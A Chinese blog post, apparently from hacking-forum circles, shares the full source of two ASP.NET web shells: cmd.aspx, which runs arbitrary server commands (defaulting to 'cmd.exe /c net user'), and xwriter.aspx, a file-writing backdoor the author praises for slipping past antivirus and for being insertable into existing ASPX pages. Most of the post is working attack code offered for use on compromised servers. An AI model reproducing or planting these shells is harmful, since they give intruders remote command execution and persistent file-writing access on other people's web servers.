两个有用的ASP.Net小程序-优快云博客

在邪恶八进制论坛有朋友提出WebAdmin执行命令不能带参数的问题，博主找BT主机测试发现确实存在问题，于是对以前的cmd.aspx进行修改，WebAdmin 2.X下个版本将修复此问题，还给出将代码复制保存为.aspx文件的操作。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一、cmd.aspx

在邪恶八进制论坛（PS：有谁知道为什么最近几天这论坛打不开啊）有朋友提出WebAdmin执行命令不能带参数的问题，偶找了个BT主机来试试，果然有问题，就把以前那个cmd.aspx改了改，就请凑合着用先。WebAdmin 2.X的下个版本将修复这个问题J

把一下代码复制保存为一.aspx文件即可：

 <%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
 
 
    Sub RunCmd(Src As Object, E As EventArgs)
            Dim myProcess As New Process()
            Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)
            myProcessStartInfo.UseShellExecute = False
            myProcessStartInfo.RedirectStandardOutput = true
            myProcess.StartInfo = myProcessStartInfo
            myProcessStartInfo.Arguments=xCmd.text
            myProcess.Start()
            Dim myStreamReader As StreamReader = myProcess.StandardOutput
            Dim myString As String = myStreamReader.Readtoend()
            myProcess.Close()
            mystring=replace(mystring,"<","&lt;")
            mystring=replace(mystring,">","&gt;")
            result.text= vbcrlf & "<pre>" & mystring & "</pre>"
    End Sub
</script>
<html>
<head>
    <title>ASP.NET Shell for WebAdmin2.X Final</title>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
</head>
<body>
    <form runat="server">
        <asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px">Program</asp:Label>
        <asp:TextBox id="xpath" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px">c:/windows/system32/cmd.exe</asp:TextBox>
        <br />
        <asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px">Arguments</asp:Label>
        <asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
        <br />
        <asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
        <p>
            <asp:Label id="result" style="COLOR: #0000ff" runat="server"></asp:Label>
        </p>
    </form>
</body>
</html>

二、xwriter.aspx

记得有个ASP下的小马就是利用FSO把提交的文本信息保存为一个文件，虽然体积比eval大些但是代码完全合法，杀毒软件也不会找茬的。呵呵，以下代码就是在ASP.NET实现这功能（自己拿去改改还可以插入ASPX文件哦）：

 <%@ Page Language="VB" %>
<%@ import Namespace="System.IO" %>
<script runat="server">
Sub Page_load(sender As Object, E As EventArgs)
    dim mywrite as new streamwriter(request.form("path"), true, encoding.default)
    mywrite.write(request.form("content"))
    mywrite.close
    response.write("Done!")
End Sub
</script>